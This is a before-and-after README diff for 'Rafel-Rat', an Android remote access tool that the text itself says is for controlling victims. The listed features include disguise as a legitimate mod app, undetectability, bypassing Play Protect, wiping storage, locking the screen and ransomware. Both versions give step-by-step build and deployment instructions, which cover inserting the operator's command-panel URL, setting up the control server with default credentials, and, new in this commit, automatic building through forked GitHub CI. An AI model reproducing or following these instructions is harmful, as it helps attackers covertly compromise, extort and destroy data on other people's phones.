README.md, before:


<p align="center">
  <img width="250" height="250" src="https://media.tenor.com/images/2c3668f83f251c47fe4319ed58961898/tenor.gif">
</p>
<h1 align="center">Rafel</h1><p align="center">
<b>Rafel</b> is <b>Remote Access Tool</b> Used to Control Victims Using <b>WebPanel</b> With More Advance Features..
</p>   

<p align=center>  
<a href=https://github.com/swagkarna><img src="https://img.shields.io/badge/Author-Swagkarna-red.svg?style=for-the-badge&label=Author" /></a>

<img src="https://img.shields.io/badge/Version-1.0-brightgreen?style=for-the-badge" >
<img src="https://img.shields.io/github/stars/swagkarna/Rafel-Rat?style=for-the-badge">  
<img src="https://img.shields.io/github/followers/swagkarna?label=Followers&style=for-the-badge">
</p>   

---
### Main Features  :
- [X] Admin Permission
- [X] Add App To White List(Ignore Battery Optimisation)
- [X] Looks Like Legit Mod App
- [X] Runs In Background Even App is Closed(May not work on some Devices)
- [X] Accessibility Feature(Cause Erros in some device --> ignore it)
- [X] Support Android v5 - v11
- [X] No Port Forwarding Needed
- [X] Acquire Wakelock
- [X] Fully Undetectable
- [X] Bypass PlayProtect
- [X] WipeSdcard
- [X] Lock Device Screen
- [X] Change Wallpaper
- [X] Ransomware
---

### Prerequisites 
 - Android Studio

OR

- [ApkEasyTool](https://forum.xda-developers.com/android/software-hacking/tool-apk-easy-tool-v1-02-windows-gui-t3333960)
---  
### Building Apk With Android Studio

1.  Open Project ***NetflixMod*** in Android Studio 
2.  Put the `command.php` link of server in InternalService.class class
3.  Build the Project
4.  Zipalign and sign the Apk...
---
### Building Apk with ApkEasyTool:

1. Unzip BlackMart(apktool).zip and  Navigate to ***\BlackMart\smali_classes2\com\velociraptor\raptor*** 
2. Open InternalService.smali 
3. Replace this with your Panel Url ***const-string v0, "https://your-webpanel-url/public/commands.php"***
---
### Building Server 
1. Upload Files in server Folder to Your HostingPanel
2. Now Open login.php 
3. Enter Username ***Hande*** Password ***Ercel***
4. Note : Make Sure your webhosting site uses Https and should have valid connection...I recommend 000webhost.com
5. You can now use panel to send commands and also refresh after it
---
### Rafel-Rat in Action [old code] :

<img width="780" height="450" src="https://github.com/swagkarna/Rafel-Rat/blob/main/2021-03-23-23-26-30_XZXbWfvD_YPKB.gif"></img>
---
## Screenshots[old]
| | | |
|:-------------------------:|:-------------------------:|:-------------------------:|
|<a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(70).png?raw=true"> <img width="2000" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(70).png?raw=true"> Panel-1</a> | <a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(71).png?raw=true"> <img width="2000" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(71).png?raw=true"> Panel-2</a> |<a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(72).png?raw=trueg"> <img width="2000" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(72).png?raw=true"> Panel-3 </a>||
<a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(73).png?raw=true"> <img width="2000" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(73).png?raw=true"> Panel-4</a>  |  <a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/1.png?raw=true"> <img width="1600" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/1.png?raw=true"> Asking Permissions</a>|<a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/2.png?raw=trueg"> <img width="1600" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/2.png?raw=true"> LegitModApp</a>||
---

### Check this Article 

- https://dontkillmyapp.com/
---
### Credits :
 - [Mehmet Şirin Sulan](https://github.com/sulanmehmetsirin)
 - Aisha
 - [GraySuit](https://github.com/graysuit)
--- 
## Disclaimer
<b>Swagkarna Provides no warranty and will not be responsible for any direct or indirect damage caused by this tool.<br>
Rafel-Rat is built for Educational and Internal use ONLY.</b>

---

## Contact :
<a href=https://discord.gg/JgWNCFNgFc><img src="https://img.shields.io/badge/Discord-swagkarna-orange?style=for-the-badge" /></a>
<a href=https://www.instagram.com/swagkarna><img src="https://img.shields.io/badge/Instagram-@swagkarna-purple?style=for-the-badge" /></a>

---

Commit message:

Wiki Updated
Instruction for building apk using github ci also added

README.md, after:


<p align="center">
  <img width="250" height="250" src="https://media.tenor.com/images/2c3668f83f251c47fe4319ed58961898/tenor.gif">
</p>
<h1 align="center">Rafel</h1><p align="center">
<b>Rafel</b> is <b>Remote Access Tool</b> Used to Control Victims Using <b>WebPanel</b> With More Advance Features..
</p>   

<p align=center>  
<a href=https://github.com/swagkarna><img src="https://img.shields.io/badge/Author-Swagkarna-red.svg?style=for-the-badge&label=Author" /></a>

<img src="https://img.shields.io/badge/Version-1.0-brightgreen?style=for-the-badge" >
<img src="https://img.shields.io/github/stars/swagkarna/Rafel-Rat?style=for-the-badge">  
<img src="https://img.shields.io/github/followers/swagkarna?label=Followers&style=for-the-badge">
</p>   

---
### Main Features  :
- [X] Admin Permission
- [X] Add App To White List(Ignore Battery Optimisation)
- [X] Looks Like Legit Mod App
- [X] Runs In Background Even App is Closed(May not work on some Devices)
- [X] Accessibility Feature(Cause Erros in some device --> ignore it)
- [X] Support Android v5 - v11
- [X] No Port Forwarding Needed
- [X] Acquire Wakelock
- [X] Fully Undetectable
- [X] Bypass PlayProtect
- [X] WipeSdcard
- [X] Lock Device Screen
- [X] Change Wallpaper
- [X] Ransomware
---

### Prerequisites 
 - Android Studio

OR

- [ApkEasyTool](https://forum.xda-developers.com/android/software-hacking/tool-apk-easy-tool-v1-02-windows-gui-t3333960)

OR

- Github ci 

---  
### Client Side Setup 
There are several methods. You can choose any one.

#### Building Apk With Github Ci
1.  Fork this project
2.  Put the `command.php` link of server in [InternalService.java](BlackMart/app/src/main/java/com/velociraptor/raptor/InternalService.java#L75) class
3.  You will see released apk in **Actions** tab after some min

#### Building Apk With Android Studio
1.  Open Project ***BlackMart*** in Android Studio 
2.  Put the `command.php` link of server in [InternalService.java](BlackMart/app/src/main/java/com/velociraptor/raptor/InternalService.java#L75) class
3.  Build the Project
4.  Sign and Zipalign the Apk

#### Building Apk with ApkEasyTool:
1. Unzip BlackMart(apktool).zip and  Navigate to ***\BlackMart\smali_classes2\com\velociraptor\raptor*** 
2. Open InternalService.smali 
3. Replace this with your Panel Url ***const-string v0, "https://your-webpanel-url/public/commands.php"***
---
### Server Side Setup 
1. Upload Files in server Folder to Your HostingPanel
2. Now Open login.php 
3. Enter Username ***Hande*** Password ***Ercel***
4. Note : Make Sure your webhosting site uses Https and should have valid connection...I recommend 000webhost.com
5. You can now use panel to send commands and also refresh after it
---
### Rafel-Rat in Action [old code] :

<img width="780" height="450" src="https://github.com/swagkarna/Rafel-Rat/blob/main/2021-03-23-23-26-30_XZXbWfvD_YPKB.gif"></img>
---
## Screenshots[old]
| | | |
|:-------------------------:|:-------------------------:|:-------------------------:|
|<a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(70).png?raw=true"> <img width="2000" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(70).png?raw=true"> Panel-1</a> | <a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(71).png?raw=true"> <img width="2000" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(71).png?raw=true"> Panel-2</a> |<a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(72).png?raw=trueg"> <img width="2000" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(72).png?raw=true"> Panel-3 </a>||
<a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(73).png?raw=true"> <img width="2000" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/Screenshot%20(73).png?raw=true"> Panel-4</a>  |  <a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/1.png?raw=true"> <img width="1600" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/1.png?raw=true"> Asking Permissions</a>|<a href="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/2.png?raw=trueg"> <img width="1600" src="https://github.com/swagkarna/Rafel-Rat/blob/main/Screenshots/2.png?raw=true"> LegitModApp</a>||
---

### Check this Article 

- https://dontkillmyapp.com/
---
### Credits :
 - [Mehmet Şirin Sulan](https://github.com/sulanmehmetsirin)
 - Aisha
 - [GraySuit](https://github.com/graysuit)
--- 
## Disclaimer
<b>Swagkarna Provides no warranty and will not be responsible for any direct or indirect damage caused by this tool.<br>
Rafel-Rat is built for Educational and Internal use ONLY.</b>

---

## Contact :
<a href=https://discord.gg/JgWNCFNgFc><img src="https://img.shields.io/badge/Discord-swagkarna-orange?style=for-the-badge" /></a>
<a href=https://www.instagram.com/swagkarna><img src="https://img.shields.io/badge/Instagram-@swagkarna-purple?style=for-the-badge" /></a>

---
